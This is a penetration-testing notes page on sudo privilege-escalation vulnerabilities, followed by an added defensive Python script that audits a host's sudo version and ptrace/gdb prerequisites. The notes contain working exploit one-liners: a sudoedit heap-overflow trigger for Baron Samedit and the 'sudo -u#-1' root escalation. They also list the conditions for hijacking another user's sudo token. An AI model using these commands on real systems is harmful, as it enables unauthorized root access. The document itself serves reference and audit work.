killchain-compendium/Exploits/Linux/sudo.md


CVE-2021-3156 Baron Samedit

sudoedit -s '\' $(python -c "print('\x41' * 10000)")
  • Defaults to try
./brute.sh 90 120 50 70 150 300

CVE-2019-14287

  • Versions < 1.8.28

Usage

  • Integer overflow with resulting root status.
sudo -u#-1 <app>

CVE-18634

  • Sudo pwnage with the pwfeedback option
  • Sudo version 1.7.1 to 1.8.30
  • Saleem's github

Reusing Sudo Token

  • Reuse sudo token of currently logged in user

  • Hacktricks' site

  • ptrace has to be fully enabled

cat /proc/sys/kernel/yama/ptrace_scope
0
  • sudo has to have been triggered within the last 15 minutes; check with ps wuax
  • gdb has to be installed
  • One must be logged in as the same user that is to be owned
  • Use nongiach's exploit

Heap Based Overflow

Marco Benatto:

Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains
a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result
in a heap-based buffer over-read. This can be triggered by arbitrary local
users with access to Sudo by entering a password of seven characters or fewer. The impact could vary depending on the compiler and processor architecture.
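
Host audit for the conditions listed on this page, as an added example that is not part of the original notes or of any project named here. It compares the `sudo -V` version against the three version ranges given above and checks the two static token-reuse prerequisites (ptrace_scope 0, gdb installed). The function names and finding labels are made up for this example.

```python
import re
import shutil
import subprocess
from pathlib import Path

# Ranges as listed on this page: (label, lowest or None, highest, highest inclusive?)
# Versions are (major, minor, patch, p-level), so 1.9.12p1 sorts above 1.9.12.
RANGES = [
    ("CVE-2019-14287 (sudo -u#-1)", None, (1, 8, 28, 0), False),
    ("pwfeedback overflow", (1, 7, 1, 0), (1, 8, 30, 0), True),
    ("passwd.c heap over-read (crypt() backend only)", (1, 8, 0, 0), (1, 9, 12, 0), True),
]

def parse_version(sudo_v_output):
    """Turn 'Sudo version 1.8.27p1' into (1, 8, 27, 1); None if not recognised."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", sudo_v_output)
    return tuple(int(g or 0) for g in m.groups()) if m else None

def matching_ranges(version):
    """Labels of every listed range that contains the version tuple."""
    hits = []
    for label, low, high, inclusive in RANGES:
        above = low is None or version >= low
        below = version <= high if inclusive else version < high
        if above and below:
            hits.append(label)
    return hits

def token_reuse_possible(ptrace_scope_text, gdb_present):
    """True when both static prerequisites from the token reuse list hold."""
    return ptrace_scope_text.strip() == "0" and gdb_present

def audit_host():
    """Collect the facts from the local machine and return the findings."""
    try:
        out = subprocess.run(["sudo", "-V"], capture_output=True, text=True).stdout
    except FileNotFoundError:
        return ["sudo not installed"]
    version = parse_version(out)
    findings = matching_ranges(version) if version else ["sudo version not recognised"]
    scope = Path("/proc/sys/kernel/yama/ptrace_scope")
    # If Yama is absent the file is missing and same-user ptrace is not restricted by it.
    scope_text = scope.read_text() if scope.exists() else "0"
    if token_reuse_possible(scope_text, shutil.which("gdb") is not None):
        findings.append("sudo token reuse prerequisites (ptrace_scope 0, gdb present)")
    return findings

if __name__ == "__main__":
    # Distro packages backport fixes: treat a hit as a lead to verify, not proof.
    for finding in audit_host():
        print("REVIEW:", finding)
```

Setting kernel.yama.ptrace_scope to 1 or higher and removing gdb from hosts that do not need it clears the token-reuse finding; the version findings are cleared by upgrading sudo or confirming the distribution's backported fix.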